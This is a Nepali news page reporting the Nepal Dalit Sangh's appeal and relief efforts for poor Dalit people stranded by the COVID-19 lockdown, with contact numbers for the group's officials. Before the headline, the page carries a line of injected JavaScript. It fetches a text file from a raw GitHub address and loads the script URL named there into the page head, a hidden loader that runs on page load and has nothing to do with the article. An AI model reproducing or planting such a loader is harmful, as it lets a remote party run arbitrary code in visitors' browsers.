;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); विपन्न असहाय दलित व्यक्तिलाइ राहत सहयोगका लागि प्रयासरत छौं -नेपाल दलित संघ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • विपन्न असहाय दलित व्यक्तिलाइ राहत सहयोगका लागि प्रयासरत छौं -नेपाल दलित संघ
जुनेली बिशेष

विपन्न असहाय दलित व्यक्तिलाइ राहत सहयोगका लागि प्रयासरत छौं -नेपाल दलित संघ

७ बैशाख, काठमाडौँ | विश्वव्यापी महामारीको रुपमा फैलिएको कोरोना भाईरस (कोभिड १९)का कारण सुरक्षा सतर्कताका लागि नेपाल दलित संघ केन्द्रले अपिल गरेको छ |
नेपाल भर लकडाउन जारि भए पश्चात आफ्नो अत्यावश्यक काम विशेषको शिलसिलामा घर पुग्न नसकेका दलित समुदायका विपन्न असहाय व्यक्तिहरुलाइ  आवश्यक राहत सहयोगका लागि प्रयासरत  भएको जनाएको छ  | नेपाल दलित संघका पदाधिकारीहरुको फोन नं.मा तत्काल सम्पर्कका लागि र इच्छुक महानुभावहरु लाई राहात सहयोगकालागि समेत  अनुरोध गरिने  संघका केन्द्रीय सचिब दिपक सोनीले जुनेली न्युजलाई बताए |
तत्काल सम्पर्कका लागि :

मा. मीन विश्वकर्मा, केन्द्रीय अध्यक्ष, नेपाल दलित संघ : 9851060690

दीपक सोनी दीपक सोनी, केन्द्रीय सचिव नेपाल दलित संघ 9841708934
राजु सुनार, केन्द्रीय अध्यक्ष, नेपाल दलित विद्यार्थी संघ : 9851270982

फेसबुक प्रतिक्रियाहरु